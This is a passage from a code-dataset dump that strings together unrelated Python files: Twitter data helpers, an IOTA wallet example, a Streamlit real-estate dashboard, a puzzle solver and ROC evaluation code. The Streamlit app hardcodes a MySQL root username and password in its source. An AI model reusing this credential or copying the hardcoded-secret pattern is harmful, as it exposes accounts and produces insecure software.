list_of_field.append(tweet.get('id'))\n\n\n # # Mentions\n # mentions = []\n # try:\n # # If there are multiple mentions, iterate thru them\n # for mention in tweet.get('extended_tweet').get('entities').get('user_mentions'):\n # mentions.append(mention.get('id'))\n # # Add all mentions as a list element to the list of field\n # list_of_field.append(mentions)\n # except AttributeError:\n # try:\n # # If there are multiple mentions, iterate thru them\n # for mention in tweet.get('entities').get('user_mentions'):\n # mentions.append(mention.get('id'))\n # # Add all mentions as a list element to the list of field\n # list_of_field.append(mentions)\n # # If there are no mentions\n # except:\n # list_of_field.append(\"None\")\n\n # # Coordinates\n # try:\n # list_of_field.append(tweet.get('coordinates').get('coordinates'))\n # except AttributeError:\n # list_of_field.append(\"None\")\n\n # Country\n try:\n list_of_field.append(tweet.get('place').get('country'))\n except AttributeError: # something to do with EOL char for each file. Dunno why. Might investigate later!\n list_of_field.append(\"None\")\n\n # # Bounding Box - Point 1\n # try:\n # list_of_field.append(tweet.get('place').get('bounding_box').get('coordinates')[0][0])\n # except AttributeError:\n # list_of_field.append(\"None\")\n\n # # Bounding Box - Point 3\n # try:\n # list_of_field.append(tweet.get('place').get('bounding_box').get('coordinates')[0][2])\n # except AttributeError:\n # list_of_field.append(\"None\")\n \n # # Full Text\n # try: \n # text = tweet.get('extended_tweet').get('full_text')\n # text_re = text.replace(\"\\n\",\" \").replace(\"\\r\",\" \").replace(\"\\\\n\" , \" \")\n # except AttributeError:\n # try:\n # text = tweet.get('text')\n # text_re = text.replace(\"\\n\",\" \").replace(\"\\r\",\" \").replace(\"\\\\n\" , \" \")\n # except:\n # text_re = \"None\"\n # list_of_field.append(text_re)\n\n # Hashtags\n hashtags = []\n # If there are multiple hashtags, iterate thru them\n try:\n for hashtag in tweet.get('extended_tweet').get('entities').get('hashtags'):\n hashtags.append(hashtag.get('text'))\n # Add all hashtags as a list element to the list of field\n list_of_field.append(hashtags)\n except AttributeError:\n try:\n # If there are multiple mentions, iterate thru them\n for hashtag in tweet.get('entities').get('hashtags'):\n hashtags.append(hashtag.get('text'))\n # Add all hashtags as a list element to the list of field\n list_of_field.append(hashtags)\n # If there are no hashtags\n except:\n list_of_field.append(\"None\")\n\n # Add this list to the bigger list\n list_of_tweets.append(list_of_field)\n\n return list_of_tweets\n\n# Parallelization Function (parallel read)\ndef parallel_read(path_list) -> list:\n '''\n param path_list (iterable): list of paths containing tweets\n return tweets (iterable): list containing several lists, each of which contain tweets as json objects\n '''\n # List containing File_num/N number of lists, each containing dictionaries of tweets\n tweets = []\n # Init parallel process\n with Pool() as pool_exec:\n # mapping the read_and_write function onto the list of file paths\n results = pool_exec.map(read_and_write , path_list)\n # Iterating through Generator Object\n for result in results:\n tweets.append(result)\n return tweets","repo_name":"sourasen1011/Introduction_to_Data_Science_Coursework","sub_path":"Twitter_Coursework/helper_func_2.py","file_name":"helper_func_2.py","file_ext":"py","file_size_in_byte":6232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9223308995","text":"import os\n\nfrom dotenv import load_dotenv\n\nfrom iota_sdk import Wallet\n\n# In this example we will get outputs stored in the account\n\n# This example uses secrets in environment variables for simplicity which\n# should not be done in production.\nload_dotenv()\n\nwallet = Wallet(os.environ['WALLET_DB_PATH'])\n\naccount = wallet.get_account('Alice')\naccount.sync()\n\n# All outputs stored in the account\noutputs = account.outputs()\n\n# Print all output ids\nprint('Output ids:')\nfor output in outputs:\n print(output.outputId)\n\n# All unspent outputs stored in the account\noutputs = account.unspent_outputs()\n\n# Print all unspent output ids\nprint('Unspent output ids:')\nfor output in outputs:\n print(output.outputId)\n","repo_name":"iotaledger/iota-sdk","sub_path":"bindings/python/examples/how_tos/accounts_and_addresses/list_outputs.py","file_name":"list_outputs.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"47"} +{"seq_id":"20656304025","text":"import pprint\nimport re\nimport time\n\nimport tweepy\n\nfrom ParsedTweet import ParsedTweet\nfrom TweetAuthor import TweetAuthor\nfrom constants import *\nfrom helpers.google_helpers import mark_tweet_as_posted_on_wks\nfrom helpers.mongo_helpers import init_mongo_client, get_all_known_authors, insert_parsed_tweets_to_mongodb, \\\n insert_many_tweets_to_seen_db, get_total_num_replacements, get_oldest_seen_tweet_id_mongo, \\\n get_most_recent_seen_tweet_id_mongo\nfrom helpers.twitter_helpers import init_twitter_client, get_twitter_user, get_user_most_recent_tweet\nfrom replacement_filter import apply_replacement_filter\n\n\ndef tweet_is_eligible(parsed_tweet: ParsedTweet) -> bool:\n if not isinstance(parsed_tweet, ParsedTweet):\n raise Exception(f'Invalid Tweet Object: {parsed_tweet}')\n return parsed_tweet.is_eligible\n\n\ndef sort_by_tweet_id(tweet) -> str:\n return str(tweet[\"tweet_id\"])\n\n\ndef get_date_for_tweet_by_id(t_id, twitter_client):\n t = twitter_client.get_tweet(id=t_id, tweet_fields=[\"id\", \"text\", \"created_at\"], expansions=[\"author_id\"])\n return t.data[\"created_at\"]\n\n\ndef get_tweet_url(tweet_id: str, username: str) -> str:\n return f'{BASE_URL}{username}/status/{tweet_id}'\n\n\ndef extract_tweet_id_from_url(url: str) -> str:\n str_url = str(url)\n if BASE_URL not in str_url:\n raise Exception(f'Invalid URL, must start with \"{BASE_URL}\"')\n id_extract_re = re.compile(f'{BASE_URL}[A-Za-z0-9]*\\/status\\/', re.IGNORECASE)\n tweet_id = re.sub(id_extract_re, '', str_url)\n return str(tweet_id)\n\n\ndef get_parsed_author_obj(author_from_db) -> TweetAuthor:\n return TweetAuthor(\n name=author_from_db[\"name\"],\n username=author_from_db[\"username\"],\n author_id=author_from_db[\"author_id\"]\n )\n\n\ndef get_parsed_tweet_obj(tweet, author: TweetAuthor) -> ParsedTweet:\n if not isinstance(author, TweetAuthor):\n raise Exception('Invalid type for \\\"author\\\"'\n f' (expected TweetAuthor, provided {type(author)})')\n filterInfo = apply_replacement_filter(tweet[\"text\"])\n res = ParsedTweet(\n author=author,\n tweet_id=str(tweet[\"id\"]),\n num_replacements=filterInfo[\"num_replacements\"],\n original_text=filterInfo[\"original_text\"],\n modified_text=filterInfo[\"modified_text\"],\n tweet_url=f'{BASE_URL}{author.username}/status/{tweet[\"id\"]}',\n created_at=tweet[\"created_at\"],\n repl_freq_map=filterInfo[\"replaced_key_freq\"]\n )\n return res\n\n\ndef get_most_recent_seen_tweet_id(author_id=None, use_prod: bool = False):\n seen_tweet_db = init_mongo_client(use_prod=use_prod)[DB_SEEN_COLLECTION_NAME]\n find_query = {}\n if author_id:\n auth_id = str(author_id)\n find_query = {\"author.author_id\": auth_id}\n # Check if at least one tweet from this author has been seen before in MongoDB\n num_seen = seen_tweet_db.count_documents(find_query)\n if num_seen is None or num_seen <= 0:\n # if no Tweet from this author has been seen before in Mongo,\n # get the most recent tweet from this Twitter User\n recent_tweet = get_user_most_recent_tweet(target_id=author_id)\n if recent_tweet:\n return None\n # return str(recent_tweet.id)\n else:\n raise Exception(\"Invalid author\")\n else:\n return get_most_recent_seen_tweet_id_mongo(author_id=author_id, use_prod=use_prod)\n # if no specified author\n return get_most_recent_seen_tweet_id_mongo(use_prod=use_prod)\n\n\ndef drop_unposted_tweets(use_prod: bool = False):\n db = init_mongo_client(use_prod=use_prod)\n tweet_db = db[DB_TWEET_COLLECTION_NAME]\n posted_res = tweet_db.find({\"posted\": True}).sort(\"_id\", 1)\n posted_ids = list()\n posted_text = set()\n for t in posted_res:\n posted_ids.append(t[\"_id\"])\n posted_text.add(t[\"modified_text\"])\n return tweet_db.delete_many(filter={\"$and\": [{\"posted\": False}, {\"_id\": {\"$nin\": posted_ids}}]})\n\n\ndef drop_eligible_duplicates(use_prod: bool = False):\n db = init_mongo_client(use_prod=use_prod)\n tweet_db = db[DB_TWEET_COLLECTION_NAME]\n seen_db = db[DB_SEEN_COLLECTION_NAME]\n # get all posted tweets\n posted_res = tweet_db.find({\"posted\": True}).sort(\"_id\", 1)\n posted_ids = set()\n posted_text = set()\n for t in posted_res:\n posted_ids.add(t[\"_id\"])\n posted_text.add(t[\"modified_text\"])\n # get all unposted tweets\n unposted_res = tweet_db.find({\"posted\": False}).sort(\"_id\", 1)\n\n seen = set()\n unposted_mod_text = set()\n u_ids = list()\n for t in unposted_res:\n mod_txt = t[\"modified_text\"]\n seen.add(t[\"_id\"])\n if mod_txt not in unposted_mod_text and mod_txt not in posted_text:\n unposted_mod_text.add(mod_txt)\n u_ids.append(t[\"_id\"])\n delete_res = tweet_db.delete_many(filter={\"$and\": [{\"posted\": False}, {\"_id\": {\"$nin\": u_ids}}]})\n return delete_res\n\n\ndef revisit_insert_helper(seen_db, tweet_db, show_output: bool, parsed_tweets):\n if show_output:\n print(f'Inserting {len(parsed_tweets)} docs...')\n seen_res = insert_many_tweets_to_seen_db(seen_db=seen_db, parsed_tweets=parsed_tweets)\n insert_res = insert_parsed_tweets_to_mongodb(tweet_db=tweet_db, parsed_tweets=parsed_tweets)\n num_skipped = insert_res[\"num_skipped\"]\n if show_output:\n print(f'{num_skipped} skipped.')\n pprint.pprint(seen_res)\n pprint.pprint(insert_res)\n return num_skipped\n\n\ndef revisit_seen_tweets(show_output=False, use_prod: bool = False):\n # refresh Mongo connections\n db = init_mongo_client(use_prod=use_prod)\n tweet_db = db[DB_TWEET_COLLECTION_NAME]\n seen_db = db[DB_SEEN_COLLECTION_NAME]\n author_db = db[DB_AUTHORS_COLLECTION_NAME]\n num_seen_start = seen_db.count_documents({})\n num_eligible_start = tweet_db.count_documents({})\n drop_unposted_tweets(use_prod=use_prod)\n posted_tweets = tweet_db.find({\"posted\": True})\n posted_ids = set()\n for t in posted_tweets:\n posted_ids.add(str(t[\"tweet_id\"]))\n\n if show_output:\n print(f\"Num Seen (start): {num_seen_start}\")\n print(f\"Num Eligible (start): {num_eligible_start}\")\n # refresh Twitter client\n twitter_client = init_twitter_client()\n all_seen_tweet_docs = seen_db.find({}, {\"_id\": 1, \"tweet_id\": 1}).sort(\"_id\", -1)\n\n # get list of IDs for all the \"seen\" tweets\n to_visit_ids = list()\n for t in all_seen_tweet_docs:\n tweet_id = str(t[\"tweet_id\"])\n if tweet_id not in posted_ids:\n to_visit_ids.append(str(t[\"tweet_id\"]))\n\n # have to split list into segments of 100 because twitter API only allows 100 at a time\n split_size = 100\n a_splitted = [to_visit_ids[x:x + split_size] for x in range(0, len(to_visit_ids), split_size)]\n\n known_authors_res = get_all_known_authors(author_db=author_db, use_prod=use_prod)\n authors = list(map(lambda x: get_parsed_author_obj(x), known_authors_res))\n auth_dict = {}\n total_num_skipped = 0\n total_num_retrieved = 0\n for a in authors:\n auth_dict[str(a.author_id)] = a\n\n tweet_objs = list()\n for segment in a_splitted:\n retrieved_tweets = twitter_client.get_tweets(\n ids=segment,\n expansions=\"author_id\",\n tweet_fields=[\"id\", \"text\", \"created_at\"],\n user_fields=[\"username\"]\n )\n total_num_retrieved += len(retrieved_tweets.data)\n if show_output:\n print(f'{len(retrieved_tweets.data)} Tweets retrieved.')\n\n # newly_retrieved_objs = list(map(lambda x: get_parsed_tweet_obj(x, auth_dict[str(x[\"author_id\"])]), retrieved_tweets.data))\n newly_retrieved_objs = [get_parsed_tweet_obj(x, auth_dict[str(x[\"author_id\"])]) for x in retrieved_tweets.data]\n tweet_objs.extend(newly_retrieved_objs)\n # minimize frequency of DB queries\n if len(tweet_objs) > 800:\n skipped = revisit_insert_helper(\n seen_db=seen_db,\n tweet_db=tweet_db,\n show_output=show_output,\n parsed_tweets=tweet_objs\n )\n total_num_skipped += skipped\n tweet_objs = list()\n\n # One more for good measure\n if len(tweet_objs) > 0:\n skipped = revisit_insert_helper(\n seen_db=seen_db,\n tweet_db=tweet_db,\n show_output=show_output,\n parsed_tweets=tweet_objs\n )\n total_num_skipped += skipped\n if show_output:\n print('Done.')\n print(f\"startNum: {num_eligible_start}\")\n print(f\"Total retrieved: {total_num_retrieved}\")\n print(f\"Total skipped: {total_num_skipped}\")\n print(f\"Net: {total_num_retrieved - total_num_skipped}\")\n drop_eligible_duplicates(use_prod=use_prod)\n\n\ndef mark_tweet_as_posted(tweet_id: str, tweet_db=None, use_prod: bool = False):\n if tweet_db is None:\n tweet_db = init_mongo_client(use_prod=use_prod)[DB_TWEET_COLLECTION_NAME]\n post_q_db = init_mongo_client(use_prod=use_prod)[DB_POST_Q_COLLECTION_NAME]\n found_tweet = tweet_db.find_one({\"_id\": str(tweet_id)})\n found_q = post_q_db.find_one({\"_id\": str(tweet_id)})\n if found_tweet and not found_tweet[\"posted\"]:\n t_id = found_tweet[\"_id\"]\n update_res = tweet_db.update_one(filter={\"_id\": str(t_id)}, update={\"$set\": {\"posted\": True}})\n update_res_2 = post_q_db.update_one(filter={\"_id\": str(tweet_id)}, update={\"$set\": {\"posted\": True}})\n # Update google doc\n mark_tweet_as_posted_on_wks(str(t_id))\n return True\n return False\n\n\n# =============== UNIT CONVERSIONS =========\n\n\ndef hours_to_seconds(num_hours: float = 1.0) -> float:\n num_seconds = round(num_hours * SECONDS_PER_HOUR, 2)\n if num_seconds < MIN_INTERVAL_SECONDS:\n raise Exception(f'Interval must be longer than {MIN_INTERVAL_SECONDS}')\n return num_seconds\n\n\ndef minutes_to_seconds(num_minutes: int = DEFAULT_INTERVAL_MINUTES) -> float:\n num_seconds = round(num_minutes * SECONDS_PER_MINUTE, 2)\n if num_seconds < MIN_INTERVAL_SECONDS:\n raise Exception(f'Interval must be longer than {MIN_INTERVAL_SECONDS}')\n return num_seconds\n\n\ndef seconds_to_minutes(num_seconds: float) -> float:\n num_minutes = round((num_seconds / SECONDS_PER_MINUTE), 3)\n return num_minutes\n\n\ndef seconds_to_hours(num_seconds):\n num_hours = round(num_seconds / SECONDS_PER_HOUR, 3)\n return num_hours\n\n","repo_name":"bweir27/NewsRephrased_python","sub_path":"helpers/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":10464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37709994807","text":"from soma import aims\n\n\ndef mesh_transform(path_mesh, path_transfo, path_mesh_out):\n transfo = aims.read(path_transfo)\n mesh = aims.read(path_mesh)\n h = mesh.header()\n aims.SurfaceManip.meshTransform(mesh, transfo)\n aims.write(mesh, path_mesh_out)\n pass\n\n\nif __name__ == \"__main__\":\n\n from configuration.configuration import (\n SUBJ_LIST,\n MESHES_TYPE,\n SIDES,\n T1_2_DWI,\n MESHES_BRAINVISA,\n )\n\n for i, subject in enumerate(SUBJ_LIST):\n for mesh_type in MESHES_TYPE:\n for side in SIDES.keys():\n mesh_transform(\n MESHES_BRAINVISA[(subject, side, mesh_type, \"t1\")],\n T1_2_DWI,\n MESHES_BRAINVISA[(subject, side, mesh_type, \"dwi\")],\n )\n","repo_name":"alexpron/article_central_sulcus_connectivity","sub_path":"scripts/pipeline/b_mri_processing/structural/d_apply_linear_transform_mesh.py","file_name":"d_apply_linear_transform_mesh.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"71587557904","text":"import geopandas\nimport streamlit as st\nimport pandas as pd\nimport folium\nfrom datetime import datetime\nimport mysql.connector as connection\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import StrMethodFormatter, NullFormatter\nimport plotly.express as px\n\nfrom streamlit_folium import folium_static\n\n\nst.set_page_config( layout='wide' )\n\nst.image('UfraLogo.png', width=300)\nst.title('Real Estate Analitycs App')\n\n# ----(Carrehando Token Mapbox)----\n\ntoken = open(r'MapboxToken.txt').read()\n\n@st.cache( allow_output_mutation=True )\ndef get_data(Host, Database, User, Passwd, Query):\n try:\n mydb = connection.connect(host=Host, database=Database, user=User, passwd=Passwd, use_pure=True) #Conexão com o BD\n query = Query #Query da tabela house\n data = pd.read_sql(query,mydb) #Salvando resultado da Query em um pandas dataframe\n mydb.close() #fechando conexão com o BD\n except Exception as e:\n mydb.close()\n print(str(e))\n\n return data\n\n\n@st.cache( allow_output_mutation=True )\ndef get_geofile( url ):\n geofile = geopandas.read_file( url )\n\n return geofile\n\n#---------------------------------------------\n#-----(Carregando dados do banco de dados)----\n#---------------------------------------------\nHost=\"localhost\"\nDatabase ='housedb'\nUser=\"root\"\nPasswd=\"Master2010\"\nQuery=\"Select * from houses;\"\n\ndata = get_data(Host, Database, User, Passwd, Query)\n\n\n\n#---------------------------------------------\n#-------------(Gerar geofile)-----------------\n#---------------------------------------------\n\nurl = 'https://opendata.arcgis.com/datasets/83fc2e72903343aabff6de8cb445b81c_2.geojson'\ngeofile = get_geofile( url )\n\n\n\n#---------------------------------------------\n#------(Criando / Modificando Colunas )-------\n#---------------------------------------------\n\n\n#Editando tabela dates - para para datetime e no formato Ano, Mês e dia\ndata['dates'] = pd.to_datetime(data['dates']).dt.strftime('%Y-%m-%d')\n\n#Criando tabela \"year\" em datetime e no formado Ano\ndata['year'] = pd.to_datetime( data['dates'] ).dt.strftime( '%Y' )\n\n#Criando tabela \"year_week\" em datetime e no formado Ano-Mês\ndata['year_week'] = pd.to_datetime( data['dates'] ).dt.strftime( '%Y-%U' )\n\n#Criando tabela \"is_waterfront\"\ndata['is_waterfront'] = data['waterfront'].apply( lambda x: 'sim' if x == 1 else 'não' )\n\n\n\n#---------------------------------------------\n#-----(Seleção de dados - menu lateral)-------\n#---------------------------------------------\n\nst.sidebar.title('Filtros')\n# Codigo Postal\nf_zipcode = st.sidebar.multiselect( 'Selecione o código postal', data['zipcode'].unique() )\n\n#Filtro - Vista para o mar\n\nf_isWaterfront = st.sidebar.checkbox('De frente para o mar')\n\n# Preço\nmin_price = int( data['price'].min() )\nmax_price = int( data['price'].max() )\navg_price = int( data['price'].max() )\nf_price = st.sidebar.slider( 'Preço máximo', min_price, max_price, avg_price, step=1 )\n\n# Tamanho mínimo da sala de estar\nmin_living = int( data['sqft_living'].min() )\nmax_living = int( data['sqft_living'].max() )\navg_living = int( data['sqft_living'].min() )\nf_living = st.sidebar.slider( 'Tamanho mínimo da sala de estar', min_living, max_living, avg_living, step=1 )\n\n#Filtro - Numéro mínimo de banheiros\nmin_bathrooms = int( data['bathrooms'].min() )\nmax_bathrooms = int( data['bathrooms'].max() )\navg_bathrooms = int( data['bathrooms'].min() )\nf_bathrooms = st.sidebar.slider( 'Numéro mínimo de banheiros', min_bathrooms, max_bathrooms, avg_bathrooms, step=1 )\n\n#Filtro - Tamanho mínimo de sótão\nmin_basement = int( data['sqft_basement'].min() )\nmax_basement = int( data['sqft_basement'].max() )\navg_basement = int( data['sqft_basement'].min() )\nf_basement = st.sidebar.slider( 'Tamanho mínimo de sótão', min_basement, max_basement, avg_basement, step=1 )\n\n#Filtro - Condição Mínima\nmin_conditions = int( data['conditions'].min() )\nmax_conditions = int( data['conditions'].max() )\navg_conditions = int( data['conditions'].min() )\nf_conditions = st.sidebar.slider( 'Condição Mínima', min_basement, max_basement, avg_basement, step=1 )\n\n\n# setup filters\nmin_date = datetime.strptime( data['dates'].min(), '%Y-%m-%d' )\nmax_date = datetime.strptime( data['dates'].max(), '%Y-%m-%d' )\nf_date = st.sidebar.slider( 'data', min_date, max_date, max_date )\n\n\n\n\n\n#OK\nif ( (f_zipcode != []) & (f_isWaterfront)):\n data = data.loc[data['zipcode'].isin( f_zipcode ) & (data['waterfront'] == 1)]\n#OK\nelif ( (f_zipcode != []) & (not f_isWaterfront) ):\n data = data.loc[data['zipcode'].isin( f_zipcode )]\n#ok\nelif ( (f_zipcode == []) & (f_isWaterfront)):\n data = data.loc[data['waterfront'] == 1]\n\nelse:\n data = data[(data['price'] < f_price) &\n (data['sqft_living'] > f_living) &\n (data['bathrooms'] > f_bathrooms) &\n (data['sqft_basement'] > f_basement) &\n (data['conditions'] > f_conditions) &\n (data['dates'] < f_date.strftime( '%Y-%m-%d' ))]\n \n\n\n\n\n#----------------------------------------------\n#---------(Carregando data frame)--------------\n#----------------------------------------------\n\nst.title( 'Dados' )\nst.write( data.head(10) )\n\n\n#----------------------------------------------\n#----------(Mapa de Casas)----------------\n#----------------------------------------------\n\n\n\nst.title( 'Casas Disponíveis' )\n\nfig = px.scatter_mapbox( data, \n lat=\"lat\", \n lon=\"lon\", \n color_discrete_sequence=['Gainsboro'],\n size_max=15, \n height=300,\n zoom=10)\n\nfig.update_layout(mapbox_style='dark', mapbox_accesstoken=token)\nfig.update_layout(height=600, margin={\"r\":0,\"t\":0,\"l\":0,\"b\":0})\n\n\nst.plotly_chart(fig)\n\n\n\n\n#----------------------------------------------\n#----------(Densidade de Preço)----------------\n#----------------------------------------------\n\n\nst.title( 'Densidade de preço' )\n\n\ndf = data[['price', 'zipcode']].groupby( 'zipcode' ).mean().reset_index()\ndf.columns = ['ZIP', 'PRICE']\n\ngeofile = geofile[geofile['ZIP'].isin( df['ZIP'].tolist() )]\n\nregion_price_map = folium.Map( location=[data['lat'].mean(), \n data['lon'].mean() ],\n default_zoom_start=15)\n \nfolium.TileLayer('cartodbdark_matter').add_to(region_price_map)\n\nregion_price_map.choropleth( data = df,\n geo_data = geofile,\n columns=['ZIP', 'PRICE'],\n key_on='feature.properties.ZIP',\n fill_color='YlOrRd',\n fill_opacity = 0.7,\n line_opacity = 0.2,\n legend_name='AVG PRICE' )\n\nfolium_static( region_price_map )\n\n\n#----------------------------------------------\n#----------(Graficos de negócio)---------------\n#----------------------------------------------\n\nst.title( 'Gráficos de Negócios' )\n\nfig1 = px.histogram( data, x='price', nbins=50)\nfig2, ax2 = plt.subplots(figsize =(7, 5))\nfig3, ax3 = plt.subplots(figsize =(7, 5))\n\n\n\n# ----(Histograma de distribuição de preço)----\n\n\n#Criando Gráfico 1\nst.title( 'Histograma de distribuição de preço' )\nst.plotly_chart( fig1 )\n\n\n# ----(Gráfico 2 - Preço médio por semana)----\n\n #Criando Gráfico 2\nst.title( \"Preço médio por semana\" )\ndata['year_week'] = pd.to_datetime( data['dates'] ).dt.strftime( '%Y-%U' )\nby_week_of_year = data[['price', 'year_week']].groupby( 'year_week' ).mean().reset_index()\nax2.bar( by_week_of_year['year_week'], by_week_of_year['price'] )\nax2.tick_params(axis='x', rotation=60)\n\n# Retira notação científica - Gráfico 2\nax2.yaxis.set_major_formatter(StrMethodFormatter('{x:.0f}'))\nax2.yaxis.set_minor_formatter(NullFormatter())\n\nst.plotly_chart(fig2, use_container_width=True)\n\n# ----(Gráfico 3 - Preço médio por dia)----\nst.title( \"Preço médio por dia\" )\n# Criando Gráfico 3 - Preço médio por dia\nby_day = data[['price', 'dates']].groupby( 'dates' ).mean().reset_index()\nax3.plot( by_day['dates'], by_day['price'] )\nax3.tick_params(axis='x', rotation=60)\n\n# Retira notação científica - Gráfico 3\nax3.yaxis.set_major_formatter(StrMethodFormatter('{x:.0f}'))\nax3.yaxis.set_minor_formatter(NullFormatter())\n\nst.plotly_chart(fig3, use_container_width=True)\n\n\n","repo_name":"luizhdramos/Real_Estate_Analytics_APP_UFRA","sub_path":"RealStateAPP.py","file_name":"RealStateAPP.py","file_ext":"py","file_size_in_byte":8401,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74440147663","text":"gear = [list(input()) for _ in range(4)]\nK = int(input())\ncmd = [list(map(int, input().split())) for _ in range(K)]\n\n\ndef move(n, d):\n tmp = gear[n][0]\n d *= -1\n for i in range(7):\n gear[n][i * d] = gear[n][d * (i + 1)]\n gear[n][7 * d] = tmp\n\n\n# n번 gear를 회전시킬 때,\n# [0 ~ n-1], [n + 1 ~ 3] gear가 움직일지 확인하는 함수\ndef check(n, pre):\n global dir, visited\n visited[n] = True\n\n if n < 0 or n >= 4 or visited[n]:\n return\n\n # 다른 gear에 의해 회전하는 경우, 어떤 gear로부터 영향을 받는지 확인\n d = 1 if pre < n else -1\n if n != pre and gear[pre][2 * d] != gear[n][-2 * d]:\n dir[n] = -dir[pre]\n\n check(n - 1, n)\n check(n + 1, n)\n\n\nfor c in cmd:\n n, d = c[0] - 1, c[1]\n dir = [0] * 4\n dir[n] = d\n visited = [False] * 4\n check(n, n)\n for i in range(4):\n if dir[i] != 0:\n move(i, dir[i])\n\nprint(sum(2 ** i for i in range(4) if gear[i][0] == '1'))\n\n# boj에서 가져온 short coding\n# from collections import deque\n# GR = [deque(list(map(int, input()))) for _ in range(4)]\n#\n# for _ in range(int(input())):\n# mid, d = map(int, input().split())\n# mid -= 1\n# GR[mid].rotate(d)\n#\n# l, r = mid-1, mid+1\n#\n# M, D = mid, d\n# while 0 <= l and GR[M][6+D] != GR[l][2]:\n# l, M, D = l-1, l, D*(-1)\n# GR[M].rotate(D)\n#\n# M, D = mid, d\n# while r < 4 and GR[M][2+D] != GR[r][6]:\n# r, M, D = r+1, r, D * (-1)\n# GR[M].rotate(D)\n#\n# print(sum(1< jour : \" + printValue(lastDay) + \" kwH ; mois : \" + printValue(lastMonth) + \" kwH\\n\")\n print(\"Consomation moyenne journalière : \" + printValue(avgDay) + \"/\" + printValue(maxDay) + \" kwH\")\n print(\"Consomation moyenne mensuelle : \" + printValue(avgMonth) + \"/\" + printValue(maxMonth) + \" kwH\")\n print(\"Marge pour aujourd'hui : \" + printValue(marginDay) + \" kwH\")\n print(\"Marge pour ce mois : \" + printValue(marginMonth) + \" kwH\")\n print(\"\\n\\n\")\n","repo_name":"telec16/LINKY_API","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2513744366","text":"from typing import List\nclass Solution:\n def peakIndexInMountainArray(self, arr: List[int]) -> int:\n \"\"\"\n >>> s = Solution()\n >>> s.peakIndexInMountainArray([0, 10, 5, 2])\n 1\n\n >>> s.peakIndexInMountainArray([3, 4, 5, 1])\n 2\n \"\"\"\n begin, end = 0, len(arr)\n res = 0\n while begin <= end:\n mid = begin + (end-begin)//2\n if mid == 0 or mid == len(arr):\n break\n if arr[mid-1] < arr[mid] < arr[mid+1]:\n begin = mid\n elif arr[mid-1] > arr[mid] > arr[mid+1]:\n end = mid\n else:\n res = mid\n break\n return res\nif __name__ == \"__main__\":\n from doctest import testmod\n testmod()","repo_name":"lunarknight00/algorithm_challenges","sub_path":"leetcode/852_Peak_Index_In_a_Mountain_Array.py","file_name":"852_Peak_Index_In_a_Mountain_Array.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24319258125","text":"import argparse\r\nimport os\r\nimport numpy as np\r\n\r\nimport _pathmagic\r\nimport pandas as pd\r\n# from acanogan import acanogan_model,acanogan_predict, acanogan_test\r\nfrom sklearn import metrics\r\nimport matplotlib.pyplot as plt\r\n# import scikitplot as skplt\r\n\r\n\r\ndef load_scores(normal_files, anomaly_files):\r\n def load(file_path):\r\n return pd.read_csv(file_path,\r\n index_col=0,\r\n header=None,\r\n names=[\"score\"])\r\n normal_scores = [load(file_path) for file_path in normal_files]\r\n anomaly_scores = [load(file_path) for file_path in anomaly_files]\r\n return normal_scores, anomaly_scores\r\n\r\n\r\ndef make_roc_dataset(normal, anomaly):\r\n normal[\"y\"] = 0\r\n anomaly[\"y\"] = 1\r\n roc_dataset = pd.concat([normal, anomaly])\r\n return roc_dataset\r\n\r\n\r\ndef cutoff(roc_dataset, fprs, tprs, thresholds, n_avg, a_avg):\r\n \"\"\"\r\n\r\n Args:\r\n fpr:\r\n tpr:\r\n thresholds:\r\n\r\n Returns:\r\n dict:fprs[cutoff_index],tprs[cutoff_index],precision,recall,specificity,f1_score,auc\r\n \"\"\"\r\n # tpr-fprが最大となる点が最適な閾値\r\n cutoff_criterion = tprs - fprs\r\n cutoff_index = cutoff_criterion.argmax()\r\n\r\n pred_label = (roc_dataset[\"score\"] > thresholds[cutoff_index]).astype(int)\r\n tn, fp, fn, tp = metrics.confusion_matrix(\r\n roc_dataset[\"y\"], pred_label, ).ravel()\r\n # recall=tp/(tp+fn)\r\n # precision=tp/(tp+fp)\r\n precision = metrics.precision_score(roc_dataset[\"y\"], pred_label)\r\n recall = metrics.recall_score(roc_dataset[\"y\"], pred_label)\r\n acuarry = metrics.accuracy_score(roc_dataset[\"y\"], pred_label)\r\n specificity = tn / (tn + fp)\r\n f1_score = metrics.f1_score(roc_dataset[\"y\"], pred_label)\r\n auc = metrics.auc(fprs, tprs)\r\n\r\n cutoff_result = {\"precision\": precision,\r\n \"recall\": recall,\r\n \"f1_score\": f1_score,\r\n \"acuarry\": acuarry,\r\n \"auc\": auc,\r\n \"fpr\": fprs[cutoff_index],\r\n \"tpr\": tprs[cutoff_index],\r\n \"specificity\": specificity,\r\n \"nomal_score_avg\": n_avg,\r\n \"anomaly_score_avg\": a_avg,}\r\n return cutoff_result\r\n\r\n\r\ndef plot_roc_curve(\r\n roc_curve_data,\r\n save_path=\"output/experiments/roc_curve/roc_test.png\"):\r\n plt.figure(figsize=(9, 9))\r\n # plt.figure(figsize=(5, 5))\r\n plt.rcParams[\"font.size\"] = 25\r\n plt.xlabel('FPR: False Positive Rate')\r\n plt.ylabel('TPR: True Positive Rate')\r\n plt.grid()\r\n plt.rcParams[\"font.size\"] = 20\r\n plt.xticks([0, 0.2, 0.4, 0.6, 0.8, 1.0])\r\n plt.plot([0, 1], [0, 1], color='gray', lw=2, linestyle='--')\r\n # for i, roc_curve_data in enumerate(roc_curve_datas):\r\n plt.plot(\r\n roc_curve_data[\"fprs\"],\r\n roc_curve_data[\"tprs\"],\r\n lw=2)\r\n # plt.legend(loc='lower right')\r\n os.makedirs(os.path.dirname(save_path), exist_ok=True)\r\n 